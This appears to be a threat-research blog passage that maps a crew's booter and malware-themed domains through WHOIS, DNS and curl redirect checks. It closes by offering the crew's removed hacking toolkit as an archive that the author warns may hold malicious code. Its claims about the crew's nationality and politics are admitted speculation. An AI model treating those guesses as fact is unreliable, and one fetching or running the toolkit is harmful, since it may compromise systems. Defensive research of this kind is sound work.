Creation Date: 2022-07-22T16:11:30Z
Registry Expiry Date: 2023-07-22T16:11:30Z
Registrar: NameSilo,LLC
Registrar IANA ID: 1479
Registrar Abuse Contact Email: abuse@namesilo.com
Registrar Abuse Contact Phone: +1.4805240066
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: See PrivacyGuardian.org
Registrant Street:  REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: AZ
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: US

ddos-booter.top

ddos-booter.top.	300	IN	A	104.21.38.212
ddos-booter.top.	300	IN	A	172.67.168.125
Domain Name: ddos-booter.top
Registry Domain ID: D20230113G10001G_94524448-top
Registrar WHOIS Server: whois.namesilo.com
Registrar URL: https://www.namesilo.com
Updated Date: 2023-01-12T16:16:05Z
Creation Date: 2023-01-12T16:03:29Z
Registry Expiry Date: 2024-01-12T16:03:29Z
Registrar: NameSilo,LLC
Registrar IANA ID: 1479
Registrar Abuse Contact Email: abuse@namesilo.com
Registrar Abuse Contact Phone: +1.4805240066
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: PrivacyGuardian.org llc
Registrant Street:  REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: AZ
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: US

ip-stresser.top

ip-stresser.top.	300	IN	A	104.21.77.142
ip-stresser.top.	300	IN	A	172.67.208.235
Domain Name: ip-stresser.top
Registry Domain ID: D20230113G10001G_94524450-top
Registrar WHOIS Server: whois.namesilo.com
Registrar URL: https://www.namesilo.com
Updated Date: 2023-01-12T16:17:18Z
Creation Date: 2023-01-12T16:03:31Z
Registry Expiry Date: 2024-01-12T16:03:31Z
Registrar: NameSilo,LLC
Registrar IANA ID: 1479
Registrar Abuse Contact Email: abuse@namesilo.com
Registrar Abuse Contact Phone: +1.4805240066
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: PrivacyGuardian.org llc
Registrant Street:  REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: AZ
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: US

malwarez.top

malwarez.top.		300	IN	A	172.67.159.163
malwarez.top.		300	IN	A	104.21.50.91
Domain Name: malwarez.top
Registry Domain ID: D20221018G10001G_89708920-top
Registrar WHOIS Server: whois.namesilo.com
Registrar URL: https://www.namesilo.com
Updated Date: 2022-10-18T20:26:31Z
Creation Date: 2022-10-17T17:45:03Z
Registry Expiry Date: 2023-10-17T17:45:03Z
Registrar: NameSilo,LLC
Registrar IANA ID: 1479
Registrar Abuse Contact Email: abuse@namesilo.com
Registrar Abuse Contact Phone: +1.4805240066
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: PrivacyGuardian.org llc
Registrant Street:  REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: AZ
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: US

pornoportugues.top

pornoportugues.top.	300	IN	A	172.67.164.98
pornoportugues.top.	300	IN	A	104.21.66.213
Domain Name: pornoportugues.top
Registry Domain ID: D20220827G10001G_86946404-top
Registrar WHOIS Server: whois.namesilo.com
Registrar URL: https://www.namesilo.com
Updated Date: 2022-08-27T00:00:43Z
Creation Date: 2022-08-26T23:53:52Z
Registry Expiry Date: 2023-08-26T23:53:52Z
Registrar: NameSilo,LLC
Registrar IANA ID: 1479
Registrar Abuse Contact Email: abuse@namesilo.com
Registrar Abuse Contact Phone: +1.4805240066
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: See PrivacyGuardian.org
Registrant Street:  REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: AZ
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: US

rootkitz.top

rootkitz.top.		300	IN	A	104.21.71.183
rootkitz.top.		300	IN	A	172.67.147.250
Domain Name: rootkitz.top
Registry Domain ID: D20221018G10001G_89708918-top
Registrar WHOIS Server: whois.namesilo.com
Registrar URL: https://www.namesilo.com
Updated Date: 2022-10-18T20:25:47Z
Creation Date: 2022-10-17T17:45:02Z
Registry Expiry Date: 2023-10-17T17:45:02Z
Registrar: NameSilo,LLC
Registrar IANA ID: 1479
Registrar Abuse Contact Email: abuse@namesilo.com
Registrar Abuse Contact Phone: +1.4805240066
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: PrivacyGuardian.org llc
Registrant Street:  REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: AZ
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: US

search-1337.cfd

search-1337.cfd.	300	IN	A	172.67.161.179
search-1337.cfd.	300	IN	A	104.21.15.50
Domain Name: SEARCH-1337.CFD
Registry Domain ID: D310075066-CNIC
Registrar WHOIS Server: whois.namesilo.com
Registrar URL: https://www.namesilo.com
Updated Date: 2022-09-09T14:51:12.0Z
Creation Date: 2022-07-19T16:43:11.0Z
Registry Expiry Date: 2023-07-19T23:59:59.0Z
Registrar: NameSilo, LLC
Registrar IANA ID: 1479
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant Organization: See PrivacyGuardian.org
Registrant State/Province: AZ
Registrant Country: US

top-product.top

top-product.top.	300	IN	A	104.21.84.156
top-product.top.	300	IN	A	172.67.194.145
Domain Name: top-product.top
Registry Domain ID: D20220720G10001G_84864269-top
Registrar WHOIS Server: whois.namesilo.com
Registrar URL: https://www.namesilo.com
Updated Date: 2022-08-06T16:26:49Z
Creation Date: 2022-07-19T20:13:38Z
Registry Expiry Date: 2023-07-19T20:13:38Z
Registrar: NameSilo,LLC
Registrar IANA ID: 1479
Registrar Abuse Contact Email: abuse@namesilo.com
Registrar Abuse Contact Phone: +1.4805240066
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: See PrivacyGuardian.org
Registrant Street:  REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: AZ
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: US

Digging Deeper

$ curl -i https://skidson.online
HTTP/2 302
date: Sun, 19 Feb 2023 13:08:49 GMT
content-type: text/html; charset=UTF-8
location: https://goshbiopsy.com/r3sbb4ewsf?key=dc45c101cc3c9c62518a9e59c9aa5631
cache-control: no-cache
referrer-policy: no-referrer
cf-cache-status: DYNAMIC
server-timing: cf-q-config;dur=6.0000020312145e-06
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5w87bQMeTS6%2F8lxbj4DON369ZMVlnDi58pDQSrcLiAEpRvAKmtIGpbNVq21il%2FoBmEEyGzp0Qz3060nDnwn%2FQl3uJBfyH4A8xfMCiGKg8aY2FGlF6kfZ0j39ZhpsZQ3HPw%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server: cloudflare
cf-ray: 79bf3bc36d6d2caf-ORD
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
$ curl -i "https://goshbiopsy.com/r3sbb4ewsf?key=dc45c101cc3c9c62518a9e59c9aa5631"
HTTP/1.1 500 Internal Server Error
Server: nginx/1.17.6
Date: Sun, 19 Feb 2023 13:09:31 GMT
Content-Type: text/html
Content-Length: 177
Connection: close

<html>
<head><title>500 Internal Server Error</title></head>
<body>
<center><h1>500 Internal Server Error</h1></center>
<hr><center>nginx/1.17.6</center>
</body>
</html>

goshbiopsy.com

goshbiopsy.com.		188	IN	A	173.233.139.164
goshbiopsy.com.		188	IN	A	173.233.137.60
goshbiopsy.com.		188	IN	A	173.233.137.52
goshbiopsy.com.		188	IN	A	173.233.137.44
goshbiopsy.com.		188	IN	A	173.233.137.36
goshbiopsy.com.		188	IN	A	192.243.61.227
goshbiopsy.com.		188	IN	A	192.243.61.225
goshbiopsy.com.		188	IN	A	192.243.59.20
goshbiopsy.com.		188	IN	A	192.243.59.13
goshbiopsy.com.		188	IN	A	192.243.59.12
Registry Domain ID: 2637923644_DOMAIN_COM-VRSN
Registrar WHOIS Server: WHOIS.ENOM.COM
Registrar URL: WWW.ENOM.COM
Updated Date: 2022-08-03T09:47:16.00Z
Creation Date: 2021-09-01T01:20:00.00Z
Registrar Registration Expiration Date: 2023-09-01T01:20:14.00Z
Registrar: ENOM, INC.
Registrar IANA ID: 48
Domain Status: clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: REDACTED FOR PRIVACY
Registrant Street: REDACTED FOR PRIVACY
Registrant Street:
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: N/A
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: CZ
NetRange:       173.233.128.0 - 173.233.159.255
CIDR:           173.233.128.0/19
NetName:        SERVERS-COM
NetHandle:      NET-173-233-128-0-1
Parent:         NET173 (NET-173-0-0-0-0)
NetType:        Direct Allocation
OriginAS:       AS7979
Organization:   Servers.com, Inc. (SERVE-105)
RegDate:        2015-06-04
Updated:        2019-07-05
Ref:            https://rdap.arin.net/registry/ip/173.233.128.0

OrgName:        Servers.com, Inc.
OrgId:          SERVE-105
Address:        2777 N. Stemmons Fwy
Address:        Suite 1655
City:           Dallas
StateProv:      TX
PostalCode:     75207
Country:        US
RegDate:        2014-10-16
Updated:        2015-02-19
Ref:            https://rdap.arin.net/registry/entity/SERVE-105
NetRange:       192.243.48.0 - 192.243.63.255
CIDR:           192.243.48.0/20
NetName:        ADVANCEDHOSTERS-NET
NetHandle:      NET-192-243-48-0-1
Parent:         NET192 (NET-192-0-0-0-0)
NetType:        Direct Allocation
OriginAS:       AS39572
Organization:   Internet Service Solution Corp. (ISSC-11)
RegDate:        2012-10-08
Updated:        2014-03-18
Ref:            https://rdap.arin.net/registry/ip/192.243.48.0

OrgName:        Internet Service Solution Corp.
OrgId:          ISSC-11
Address:        8 Copthall
City:           Roseau Valley
StateProv:
PostalCode:     00152
Country:        DM
RegDate:        2012-09-24
Updated:        2014-03-18
Comment:        http://www.advancedhosters.com
Ref:            https://rdap.arin.net/registry/entity/ISSC-11

Overall Assessment

possible locales: China, Portugal, Czechia, Slovenia, Other
namesilo in Arizona
servers.com in Dallas, Texas
advancedhosters.net in Dominica

I don’t think any of what this crew does is technically illegal, at least what they publish outright. There could be things they do in private obviously with these scripts, but anything that I’m looking at directly does not indicate direct illegality. As a result, I have no reason to publish anything about their identities directly, so I have obfuscated everything on that front.

However, the code is very informative on how some adversaries operate. Even if most of the techniques themselves are not difficult, seeing the specific tools used (ffuf, httprobe, nuclei, assetfinder), and code developed is informative. They are definitely not unskilled and have demonstrated in their chats their own skill.

Initially they seem to have started out as an AdventureQuest World private server. I’m not sure if they were purchased by an SEO monetization system or if it’s the original team that has just repositioned themselves.

Their politics appear to be that of a pro-Russia stance and perhaps(?) some racism. I make this conclusion by two of their core members having mutual Discord servers with myself where the stopped posting information about the Ukrainian war immediately after invasion began. Also, they have posted many pro-Russian statements.

They have also posted this flag with an anime character affixed:

So they could be Slovenian. That makes things hard given they speak no Russian or Slovenian in this server, just English and Portuguese. This makes me believe that they are just masking their origin even further. This is Astolfo, a character from TYPE-MOON, so it could be unrelated entirely:

https://typemoon.fandom.com/wiki/Astolfo

I have seen this character used in anti-trans extremist communities, so that could be part of it as well. I know very little if anything about TYPE-MOON, but Astolfo looking very very feminine, seems to be listed as male so could represent the trans community to some extremists. This also could mean they are ANTI-Slovenian, who knows.

They also cannot stop using the N-word. That is even quoted above. This is interspersed with fake arguments about BLM, which is really just there to agitate for no real reason other than to appeal to anger the users in the server. I’m not really sure what their goal is there, perhaps to get someone to report them so they can move to a new server and know who is a “glowie” so they can move on.

They also created, REALLY early on during the leaking of LLaMA, their own “BasedGPT” Discord bot that was spewing nothing but racism, conspiracy theories, and fairly accurate depictions of high level security topics.

Racism is used in hacking circles mostly to weed out people or to specifically block certain things from being analyzed. It can also be used to confuse, distract, or intimidate.

Back to the crew, I’ve stated this before and I’ll state it again, I do not understand why people seek out paranoid states as someone who is naturally paranoid. It’s not healthy, and I wish I had a choice like they do, yet they squander their lives deep in it. I’ve heard from various accounts of people leaving this life of SEO crime and their lives getting better from a mental health perspective as well as financially. Some people have to learn the hard way, but to each their own.

There were also a lot of hacking tools available on their GitHub page which was removed by them slowly. I am publishing their entire toolkit here which used to exist under https://github.com/chakal1337.

Toolkit

Please be aware that this could contain malicious code, including embedded Javascript in the HTML, or code that could be used for malicious or tracking purposes. All code is to be used for research purposes only, and be careful when analyzing. Much of the real interesting stuff can be found in old commits that were torched with later commits replacing it with JS analytics to monitor you if you open the HTML, so be careful and open in a non-network connected VM. You have been warned.

chakal1337.tar.xz